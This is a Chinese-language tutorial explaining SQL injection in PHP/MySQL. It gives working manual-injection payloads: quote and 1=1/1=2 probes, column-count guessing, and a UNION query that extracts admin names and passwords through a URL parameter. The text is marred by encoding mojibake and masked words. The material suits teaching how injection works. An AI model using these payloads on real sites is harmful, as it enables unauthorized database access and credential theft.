PHP和MYSQL注入的發(fā)生原因解析
發(fā)布時(shí)間:2021-09-14 11:25
來(lái)源:億速云
閱讀:0
作者:chen
欄目: 網(wǎng)絡(luò )安全
歡迎投稿:712375056
本篇內容介紹了“PHP和注入的發(fā)生原因解析”的有關(guān)知識��,在實(shí)際案例的操作過(guò)程中�,不少人都會(huì )遇到這樣的困境��,接下來(lái)就讓小編帶領(lǐng)大家學(xué)習一下如何處理這些情況吧�����!希望大家仔細閱讀����,能夠學(xué)有所成�!
當articleid 變量取值為123 時(shí)��,我們假設一下在中會(huì )有怎樣的代碼運行?
1. SELECT * /* Select 函數讀取信息*/
2. FROM infotable /* 從products 數據表中*/
3. WHERE id='123';/* false condition 滿(mǎn)足條件時(shí)*/
/*XXXX*/是注釋符號��,當程序運行時(shí)��,/**/和中間的部分計算機會(huì )自動(dòng)忽略���。
實(shí)際系統執行的代碼是這樣的:
1. select * from infotable where id = '123';
在這里��,id 的取值是通過(guò)url 取值得來(lái)的“123”����,那么如果我這樣呢:
info.php?articleid=123'
后面多了一個(gè)單引號�����,那么比較一下系統原本執行的語(yǔ)句有什么變化:
1. select * from infotable where id = 123;
2. select * from infotable where id = 123';
***多了一個(gè)引號����,語(yǔ)法錯誤��。
注:計算機編程得不到想要的結果�,錯誤分兩種�����,一種是語(yǔ)法錯誤���,一種是邏輯錯誤�。后面認真閱讀你會(huì )慢慢明白區別開(kāi)的��,這也就是為什么判斷是否為注入點(diǎn)的***步要在網(wǎng)址后面加單引號的原因了(加單引號出錯不能確定網(wǎng)址為注入點(diǎn)���,只是判斷的一個(gè)步驟而已)���,于是后面的1=1 和1=2 的目的也就清楚了�����。
1. select * from infotable where id = 123;
2. select * from infotable where id = 123 and 1 = 1;//事實(shí)上1 就是1��,所以應該
返回正常頁(yè)面
3. select * from infotable where id = 123 and 1 = 2;//事實(shí)上��,計算機中1 永遠也不等于2��,發(fā)生邏輯錯誤����,所以返回錯誤頁(yè)面����。手工注入通常會(huì )使用聯(lián)合查詢(xún)函數union 下面講一下union 的用法��。
union 注入的***步通常是猜字段數�����。假設注入點(diǎn)是新聞頁(yè)面�,那么頁(yè)面中執行的SQL 語(yǔ)句就是:
1. select title,date,author,news,comm from news where id = 12;
當你進(jìn)行union 注入的時(shí)候�,union 前面的語(yǔ)句和union 后面的語(yǔ)句�,都是一個(gè)完整的SQL
語(yǔ)句��,是可以單獨執行的語(yǔ)句
但是���,必須保證前后的字段數相同���,例如上面這個(gè)語(yǔ)句
1. select title,date,author,news,comm from news where id = 12;
2. select title,date,author,news,comm from news where id = 12 union select
name,password,3,4,5 from admin;
3. //news 是新聞表段�����,admin 是管理員信息表段
4. //管理員信息表段明顯沒(méi)有union 前面news 表段里面包含的字段數多所以使用數字3 到5 替代�����,數字無(wú)固定格式��,可以使1 2 和3�,也可以是111111 和4435435或者干脆用null 空來(lái)代替�����。
所以���,上面的注入語(yǔ)句在實(shí)際中就是這么構造:
1. info.php?id=12+union+select+name,password,3,4,5+from+admin
2. //SQL 注入中����,加號用來(lái)代表空格的意思�����,因為有些瀏覽器會(huì )自動(dòng)將空格轉換成%20��,
如果union 前面是5 個(gè)�����,而union 后面不是5 個(gè)��,則會(huì )發(fā)生邏輯錯誤����,顯示錯誤頁(yè)面����。
由于程序員編寫(xiě)的程序我們并不知道他在數據庫中設置了幾個(gè)字段����,所以通常我們都是先進(jìn)行字段數的猜測��,也就是:
1. info.php?id=12+union+select+1
2. info.php?id=12+union+select+1,2
3. info.php?id=12+union+select+1,2,3
4. info.php?id=12+union+select+1,2,3,4
5. info.php?id=12+union+select+1,2,3,4,5
6. //你也可以用order by 來(lái)猜����,用法可以自己搜一下
一直這樣猜到正確頁(yè)面出來(lái)��,沒(méi)有了邏輯錯誤�,也就表示字段數一致了�����,然后……后面……
這里僅僅提供思路��。
